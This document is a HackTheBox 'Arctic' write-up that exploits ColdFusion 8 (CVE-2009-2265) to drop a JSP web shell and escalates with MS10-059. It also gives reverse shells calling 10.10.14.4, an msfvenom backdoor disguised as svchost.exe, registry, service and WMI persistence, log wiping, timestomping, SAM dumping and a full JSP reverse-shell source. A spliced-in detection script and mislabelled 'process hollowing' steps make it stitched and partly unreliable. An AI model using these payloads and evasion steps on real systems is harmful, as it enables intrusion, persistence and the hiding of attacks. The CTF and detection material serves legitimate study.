
HackTheBox Arctic

Writeup for HackTheBox Arctic


Machine Synopsis

Key Exploitation Techniques:

  • ColdFusion 8 directory traversal and file upload vulnerability (CVE-2009-2265)
  • JSP web shell deployment and execution
  • Windows kernel privilege escalation (MS10-059)
  • Handling slow network responses and application timeouts

Reconnaissance & Enumeration

Port Discovery

$ nmap -p- --min-rate 10000 10.10.10.11
PORT      STATE SERVICE
135/tcp   open  msrpc
8500/tcp  open  fmtp
49154/tcp open  unknown

Service Enumeration

$ nmap -p 135,8500,49154 -sC -sV 10.10.10.11
PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC

Web Application Discovery

[Screenshots of the port 8500 web interface: Port8500.png, Port8500_2.png, Port8500_3.png]

Accessing http://10.10.10.11:8500 shows a directory listing:

1
2
3
Index of /
CFIDE/
cfdocs/

Navigating to /CFIDE/administrator/ reveals the Adobe ColdFusion 8 Administrator login page.

[Screenshot of the ColdFusion 8 Administrator login page: Admin.png]

ColdFusion Version Identification

# Check for version disclosure
$ curl -s http://10.10.10.11:8500/CFIDE/administrator/ | grep -i "version\|coldfusion"
<title>ColdFusion Administrator</title>
<!-- ColdFusion Administrator Login -->

Attempting default credentials fails. The application is very slow to respond.

Exploitation

CVE-2009-2265 Directory Traversal

ColdFusion 8.0.1 ships with an FCKeditor file-manager connector that contains a directory traversal vulnerability (CVE-2009-2265), allowing arbitrary file upload into the web root.

# Download the exploit
$ wget https://raw.githubusercontent.com/zaphoxx/zaphoxx-coldfusion/refs/heads/main/2265.py

# Create JSP web shell
$ cat > shell.jsp << 'EOF'
<%@ page import="java.util.*,java.io.*"%>
<%
String cmd = request.getParameter("cmd");
if(cmd != null) {
    Process p = Runtime.getRuntime().exec("cmd.exe /c " + cmd);
    InputStream in = p.getInputStream();
    byte[] buf = new byte[8192];
    int len = 0;
    while((len = in.read(buf)) != -1) {
        out.print(new String(buf, 0, len));
    }
    in.close();
}
%>
EOF

File Upload Exploitation

# Execute the downloaded exploit script (be patient - very slow responses)
$ python3 2265.py -t 10.10.10.11 -p 8500 -f shell.jsp
[info] Using following settings:
-----------------------------------
target    :          10.10.10.11
port      :                 8500
filepath  :            shell.jsp
basepath  :
-----------------------------------
[+] File successfully uploaded!
[+] Goto '/userfiles/file/TKVC4S.jsp' to trigger the payload!
[info] Make sure you have a listener active
[info] (e.g. nc -lvp 4444) before triggering the payload

Initial Shell Access

# Test web shell functionality
$ curl "http://10.10.10.11:8500/userfiles/file/TKVC4S.jsp?cmd=whoami"
arctic\tolis

# Set up a reverse shell listener
$ nc -nlvp 1234

# Execute reverse shell command
$ curl "http://10.10.10.11:8500/userfiles/file/TKVC4S.jsp?cmd=powershell%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%2710.10.14.4%27%2C1234%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22"
PS C:\ColdFusion8\runtime\bin> whoami
arctic\tolis

PS C:\ColdFusion8\runtime\bin> cd C:\Users\tolis\Desktop
PS C:\Users\tolis\Desktop> type user.txt
02650d3a69a70780c302e146a6cb96f3

Privilege Escalation

System Information Gathering

PS C:\ColdFusion8\runtime\bin> systeminfo
Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 N/A

Vulnerability Assessment

# Use Windows Exploit Suggester
$ python windows-exploit-suggester.py --database 2021-05-23-mssb.xls --systeminfo sysinfo.txt

[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[*]   https://www.exploit-db.com/exploits/14610/ -- Chimichurri: Windows Vista/7/2008/2008 R2 Local Privilege Escalation

MS10-059 (Chimichurri) Exploitation

# Download Chimichurri exploit
$ wget https://github.com/egre55/windows-kernel-exploits/raw/master/MS10-059:%20Chimichurri/Compiled/Chimichurri.exe

# Set up an SMB server for file transfer
$ impacket-smbserver share . -smb2support
# Transfer exploit to target
PS C:\ColdFusion8\runtime\bin> net use \\10.10.14.4\share
The command completed successfully.

PS C:\ColdFusion8\runtime\bin> copy \\10.10.14.4\share\Chimichurri.exe .
        1 file(s) copied.

# Set up a listener for the elevated shell (on attacking machine)
$ nc -nlvp 443

# Execute privilege escalation
PS C:\ColdFusion8\runtime\bin> .\Chimichurri.exe 10.10.14.4 443

SYSTEM Shell Access

Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\ColdFusion8\runtime\bin> whoami
nt authority\system

C:\ColdFusion8\runtime\bin> cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop> type root.txt
ce65ceee66b2b5ebaff07e50508ffb90

Post-Exploitation Techniques

Persistence Methods

Registry Persistence

# Create backdoor payload
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.4 LPORT=4444 -f exe -o backdoor.exe

# Transfer to target via SMB (on attacking machine)
$ impacket-smbserver share . -smb2support
# Download and install backdoor
C:\> copy \\10.10.14.4\share\backdoor.exe C:\Windows\System32\svchost.exe

# Add registry auto-start entry
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityCenter" /t REG_SZ /d "C:\Windows\System32\svchost.exe"

# Verify persistence
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityCenter"

Service Installation

# Create persistent service
sc create "ColdFusionSvc" binpath= "C:\Windows\System32\svchost.exe" start= auto
sc start "ColdFusionSvc"
sc query "ColdFusionSvc"

# Set up a handler for backdoor connections (on attacking machine)
$ msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.4
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit

WMI Event Subscription

# Create WMI event subscription for persistence
wmic /namespace:"\\root\subscription" PATH __EventFilter CREATE Name="SystemUpdate", EventNameSpace="root\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfRawData_PerfOS_System'"

wmic /namespace:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="SystemUpdate", CommandLineTemplate="C:\Windows\System32\svchost.exe"

wmic /namespace:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"SystemUpdate\"", Consumer="CommandLineEventConsumer.Name=\"SystemUpdate\""

Defense Evasion

Log Cleanup

# Clear Windows Event Logs
wevtutil cl Application
wevtutil cl Security
wevtutil cl System

# Clear IIS logs (ColdFusion uses IIS)
del "C:\inetpub\logs\LogFiles\W3SVC1\*.log"

# Clear ColdFusion logs
del "C:\ColdFusion8\logs\*.log"
del "C:\ColdFusion8\runtime\logs\*.log"

File Attribute Manipulation

# Hide backdoor files
attrib +h +s C:\Windows\System32\svchost.exe

# Timestomp files to match system files
powershell "(Get-Item C:\Windows\System32\svchost.exe).LastWriteTime = (Get-Item C:\Windows\System32\kernel32.dll).LastWriteTime"
powershell "(Get-Item C:\Windows\System32\svchost.exe).CreationTime = (Get-Item C:\Windows\System32\kernel32.dll).CreationTime"

Process Hollowing

# Kill original svchost process and replace
taskkill /f /im svchost.exe /fi "pid eq 1234"
start C:\Windows\System32\svchost.exe

Lateral Movement Preparation

Network Discovery

# Discover other systems on network
for /L %i in (1,1,254) do @ping -n 1 -w 200 10.10.10.%i > nul && echo 10.10.10.%i is up

# Check for open shares
net view \\10.10.10.20

Credential Harvesting

# Dump SAM database
reg save HKLM\SAM C:\Windows\Temp\sam
reg save HKLM\SYSTEM C:\Windows\Temp\system

# Search for stored passwords in ColdFusion config
type "C:\ColdFusion8\lib\neo-datasource.xml" | findstr password
type "C:\ColdFusion8\lib\neo-security.xml" | findstr password

Domain Enumeration

# Check domain membership
echo %USERDOMAIN%
net user /domain
net group "Domain Admins" /domain

Alternative Exploitation Methods

Manual ColdFusion Exploitation

# Manual directory traversal for file upload
curl -X POST "http://10.10.10.11:8500/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/" \
  -F "NewFile=@shell.jsp" \
  -H "Content-Type: multipart/form-data"

# Alternative upload path
curl -X POST "http://10.10.10.11:8500/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/cf_upload.cfm" \
  -F "NewFile=@shell.jsp;filename=../../../wwwroot/shell.jsp"
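A detection-side counterpart to the upload and web-shell steps above (the CVE-2009-2265 connector POST in both the scripted and the manual variant, and the /userfiles/file/*.jsp?cmd= requests). This is an added example and not part of the original writeup: it scans constructed ColdFusion/IIS-style access-log lines for connector POSTs, traversal sequences and web-shell command requests, and correlates them per source IP. The simplified log format and the sample lines are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample access-log lines (client-ip method uri-stem uri-query status).
SAMPLE_LOG = """\
10.10.14.4 GET /CFIDE/administrator/index.cfm - 200
10.10.14.4 POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm Command=FileUpload&Type=File&CurrentFolder=/ 200
10.10.14.4 GET /userfiles/file/TKVC4S.jsp cmd=whoami 200
10.10.10.50 GET /cfdocs/index.htm - 200
10.10.14.4 GET /userfiles/file/TKVC4S.jsp cmd=powershell%20-c%20%22%24client%22 200
10.10.10.51 POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/cf_upload.cfm CurrentFolder=..%2F..%2Fwwwroot 500
"""

FCK_CONNECTOR = "/cfide/scripts/ajax/fckeditor/editor/filemanager/connectors/cfm/"
TRAVERSAL = re.compile(r"\.\.[/\\]")  # matched after one round of URL decoding

def classify(line):
    """Return the list of tags for one log line (empty if nothing suspicious)."""
    fields = line.split(" ")
    if len(fields) != 5:
        return []
    ip, method, stem, query, status = fields
    path = unquote(stem).lower()
    tags = []
    if method == "POST" and path.startswith(FCK_CONNECTOR):
        tags.append("fckeditor_connector_post")  # CVE-2009-2265 upload entry point
    if TRAVERSAL.search(unquote(stem)) or TRAVERSAL.search(unquote(query)):
        tags.append("path_traversal")
    if path.startswith("/userfiles/") and path.endswith(".jsp") and "cmd" in parse_qs(query):
        tags.append("jsp_webshell_command")  # dropped payload being driven
    return tags

def scan(log_text):
    """Tag each line; an IP that POSTs to the connector and later drives a .jsp under
    /userfiles/ is reported as a complete exploit chain."""
    hits, uploaded, chains = [], set(), set()
    for line in log_text.splitlines():
        tags = classify(line)
        if not tags:
            continue
        ip = line.split(" ", 1)[0]
        hits.append((ip, tags))
        if "fckeditor_connector_post" in tags:
            uploaded.add(ip)
        if "jsp_webshell_command" in tags and ip in uploaded:
            chains.add(ip)
    return hits, sorted(chains)

if __name__ == "__main__":
    for ip, tags in scan(SAMPLE_LOG)[0]:
        print(ip, ", ".join(tags))
```

Monitoring only the connector POST misses the manual variant whose traversal lives in the multipart filename, so the web-shell request tag is the more reliable of the three in practice.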

JSP Reverse Shell

<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>

<%
  class StreamConnector extends Thread
  {
    InputStream is;
    OutputStream os;
    StreamConnector( InputStream is, OutputStream os )
    {
      this.is = is;
      this.os = os;
    }
    public void run()
    {
      BufferedReader in  = null;
      BufferedWriter out = null;
      try
      {
        in  = new BufferedReader( new InputStreamReader( this.is ) );
        out = new BufferedWriter( new OutputStreamWriter( this.os ) );
        char buffer[] = new char[8192];
        int length;
        while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
        {
          out.write( buffer, 0, length );
          out.flush();
        }
      } catch( Exception e ){}
      try
      {
        if( in != null )
          in.close();
        if( out != null )
          out.close();
      } catch( Exception e ){}
    }
  }
  
  try
  {
    String ShellPath = "cmd.exe";
    Socket socket = new Socket( "10.10.14.4", 1234 );
    Process process = Runtime.getRuntime().exec( ShellPath );
    ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
    ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
  } catch( Exception e ) {}
%>

This post is licensed under CC BY 4.0 by the author.